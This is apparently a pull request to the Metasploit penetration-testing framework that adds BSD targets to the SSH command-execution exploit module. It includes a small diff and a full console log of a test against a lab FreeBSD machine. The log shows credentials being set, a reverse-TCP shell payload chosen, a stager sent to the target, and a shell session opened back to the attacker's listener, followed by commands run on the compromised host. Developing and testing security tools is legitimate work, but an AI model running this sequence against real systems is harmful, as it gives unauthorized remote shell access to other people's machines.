### PR TITLE
Add BSD targets to exploit/multi/ssh/sshexec module

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars'     => "",
           'DisableNops'  => true
         },
-      'Platform'         => %w[linux osx unix python],
+      'Platform'         => %w[linux osx unix python bsd],
       'CmdStagerFlavor'  => %w[bourne echo printf wget],
       'Targets'          =>
         [
@@ -101,6 +101,22 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch'             => ARCH_X64,
               'Platform'         => 'osx',
               'CmdStagerFlavor'  => %w[curl wget]
+            }
+          ],
+          [
+            'BSD x86',
+            {
+              'Arch'             => ARCH_X86,
+              'Platform'         => 'bsd',
+              'CmdStagerFlavor'  => %w[printf curl wget]
+            }
+          ],
+          [
+            'BSD x64',
+            {
+              'Arch'             => ARCH_X64,
+              'Platform'         => 'bsd',
+              'CmdStagerFlavor'  => %w[printf curl wget]
             }
           ],
           [


### PR DESCRIPTION
Add BSD targets to `exploit/multi/ssh/sshexec` module.

`printf` works out of the box. `wget` and `curl` listed for consistency (not installed by default).

https://github.com/rapid7/metasploit-framework/pull/10917#issuecomment-435791912

### FreeBSD 8.0-RELEASE (amd64)

```
msf5 > use exploit/multi/ssh/sshexec 
msf5 exploit(multi/ssh/sshexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux x86
   1   Linux x64
   2   Linux armle
   3   Linux mipsle
   4   Linux mipsbe
   5   Linux aarch64
   6   OSX x86
   7   OSX x64
   8   BSD x86
   9   BSD x64
   10  Python
   11  Unix Cmd


msf5 exploit(multi/ssh/sshexec) > set target 9
target => 9
msf5 exploit(multi/ssh/sshexec) > set rhosts 172.16.191.239
rhosts => 172.16.191.239
msf5 exploit(multi/ssh/sshexec) > set payload bsd/x64/shell_reverse_tcp
payload => bsd/x64/shell_reverse_tcp
msf5 exploit(multi/ssh/sshexec) > set username user
username => user
msf5 exploit(multi/ssh/sshexec) > set password password
password => password
msf5 exploit(multi/ssh/sshexec) > run

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/ssh/sshexec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf5 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.239:22 - Sending stager...
[*] Command Stager progress -  70.00% done (497/710 bytes)
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.239:57316) at 2019-05-02 16:18:52 -0400
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (710/710 bytes)
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(user) gid=1001(user) groups=1001(user)
uname -a
FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

```
